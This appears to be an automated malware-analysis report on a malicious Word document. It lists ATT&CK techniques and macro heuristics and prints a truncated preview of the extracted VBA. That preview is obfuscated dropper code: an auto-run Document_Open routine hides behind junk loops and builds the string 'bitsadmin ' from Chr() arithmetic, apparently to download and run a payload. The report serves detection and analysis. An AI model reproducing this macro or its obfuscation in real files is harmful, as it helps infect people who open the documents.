MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing VBA macros. The presence of a Document_Open macro, a Shell() call, and a CreateObject call strongly indicates malicious intent. The VBA script likely uses these functions to download and execute a secondary payload, a common technique for malware delivery.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43608 bytes |
SHA-256: 67626604e6a8d43261b93b9d09fea98583063e93cd9ccc27f90c36afb75ff9f3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim tivSqQ As Integer tivSqQ = 4943 Do While 6833 > tivSqQ tivSqQ = tivSqQ + 1 Loop Dim tcBPEFnTmFHAss As Integer tcBPEFnTmFHAss = 3591 Do While 8395 > tcBPEFnTmFHAss tcBPEFnTmFHAss = tcBPEFnTmFHAss + 1 Loop Dim HAFIpgBizlNy As Integer HAFIpgBizlNy = 2408 Do While 4130 > HAFIpgBizlNy HAFIpgBizlNy = HAFIpgBizlNy + 1 Loop Dim YlLwvXBjaEKVhN As Integer YlLwvXBjaEKVhN = 3042 Do While 3726 > YlLwvXBjaEKVhN YlLwvXBjaEKVhN = YlLwvXBjaEKVhN + 1 Loop Dim nkGYa As Integer nkGYa = 2117 Do While 4150 > nkGYa nkGYa = nkGYa + 1 Loop Dim KdhCxFanFRoEqa As Integer KdhCxFanFRoEqa = 2075 Do While 4761 > KdhCxFanFRoEqa KdhCxFanFRoEqa = KdhCxFanFRoEqa + 1 Loop Dim mpviU As Integer mpviU = 4296 Do While 5720 > mpviU mpviU = mpviU + 1 Loop Dim DMBATmt As String Dim eImrUZddtxqsIbd As Integer eImrUZddtxqsIbd = 3963 Do While 6158 > eImrUZddtxqsIbd eImrUZddtxqsIbd = eImrUZddtxqsIbd + 1 Loop Dim NXXQGDjYtsr As Integer NXXQGDjYtsr = 1814 Do While 5982 > NXXQGDjYtsr NXXQGDjYtsr = NXXQGDjYtsr + 1 Loop Dim HCuGkOkg As Integer HCuGkOkg = 1440 Do While 1732 > HCuGkOkg HCuGkOkg = HCuGkOkg + 1 Loop Dim ttyOAPwReO As Integer ttyOAPwReO = 4383 Do While 6529 > ttyOAPwReO ttyOAPwReO = ttyOAPwReO + 1 Loop Dim QHZtoyLXUNqee As Integer QHZtoyLXUNqee = 4365 Do While 7399 > QHZtoyLXUNqee QHZtoyLXUNqee = QHZtoyLXUNqee + 1 Loop Dim YqyQNmwFDQYQ As Integer YqyQNmwFDQYQ = 1321 Do While 4121 > YqyQNmwFDQYQ YqyQNmwFDQYQ = YqyQNmwFDQYQ + 1 Loop Dim vijvXm As Integer vijvXm = 1261 Do While 4287 > vijvXm vijvXm = vijvXm + 1 Loop Dim Xmxngp As Integer Xmxngp = 2436 Do While 6804 > Xmxngp Xmxngp = Xmxngp + 1 Loop Dim lyEieVLkRpt As Integer lyEieVLkRpt = 1266 Do While 5811 > lyEieVLkRpt lyEieVLkRpt = lyEieVLkRpt + 1 Loop Dim sVKvwmzWoshIuHI As Integer sVKvwmzWoshIuHI = 1574 Do While 4105 > sVKvwmzWoshIuHI sVKvwmzWoshIuHI = sVKvwmzWoshIuHI + 1 Loop Dim EkdnL As Integer EkdnL = 4254 Do While 5959 > EkdnL EkdnL = EkdnL + 1 Loop Dim NMUnKArvequvRLT As Integer NMUnKArvequvRLT = 2727 Do While 3079 > NMUnKArvequvRLT NMUnKArvequvRLT = NMUnKArvequvRLT + 1 Loop Dim zqznnT As Integer zqznnT = 4135 Do While 5956 > zqznnT zqznnT = zqznnT + 1 Loop DMBATmt = Chr(96 + 2) & Chr(50 + 55) & Chr(6 + 110) & Chr(17 + 98) & Chr(97 + 0) Dim zBbsFqnojroGHpF As Integer zBbsFqnojroGHpF = 3707 Do While 7490 > zBbsFqnojroGHpF zBbsFqnojroGHpF = zBbsFqnojroGHpF + 1 Loop Dim jWHkJGbKpPn As Integer jWHkJGbKpPn = 4916 Do While 7829 > jWHkJGbKpPn jWHkJGbKpPn = jWHkJGbKpPn + 1 Loop Dim Pratosg As Integer Pratosg = 4218 Do While 6848 > Pratosg Pratosg = Pratosg + 1 Loop Dim fhFLrqBZ As Integer fhFLrqBZ = 3838 Do While 6146 > fhFLrqBZ fhFLrqBZ = fhFLrqBZ + 1 Loop Dim HDWmCjULI As Integer HDWmCjULI = 4689 Do While 8798 > HDWmCjULI HDWmCjULI = HDWmCjULI + 1 Loop Dim cbQEupfJaGjGJ As Integer cbQEupfJaGjGJ = 4628 Do While 7397 > cbQEupfJaGjGJ cbQEupfJaGjGJ = cbQEupfJaGjGJ + 1 Loop Dim zrrSOmF As Integer zrrSOmF = 1037 Do While 5596 > zrrSOmF zrrSOmF = zrrSOmF + 1 Loop Dim pGsoRaKs As Integer pGsoRaKs = 4677 Do While 8927 > pGsoRaKs pGsoRaKs = pGsoRaKs + 1 Loop Dim iuadUoSpIOIBII As Integer iuadUoSpIOIBII = 3110 Do While 6837 > iuadUoSpIOIBII iuadUoSpIOIBII = iuadUoSpIOIBII + 1 Loop Dim UIdjdKPCaJr As Integer UIdjdKPCaJr = 3136 Do While 7735 > UIdjdKPCaJr UIdjdKPCaJr = UIdjdKPCaJr + 1 Loop DMBATmt = DMBATmt & Chr(71 + 29) & Chr(103 + 6) & Chr(61 + 44) & Chr(104 + 6) & Chr(26 + 6) Dim giOHwbuNPdh As Integer giOHwbuNPdh = 2494 Do While 5812 > giOHwbuNPdh giOHwbuNPdh = giOHwbuNPdh + 1 Loop Dim oBVKdpeYKDhBYNo As Integer oBVKdpeYKDhBYNo = 4915 Do While 6499 > oBVKdpeYKDhBYNo oBVKdpeYKDhBYNo = oBVKdpeYKDhBYNo + 1 Loop Dim gGWLhoN As Integer gGWLhoN = 4335 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.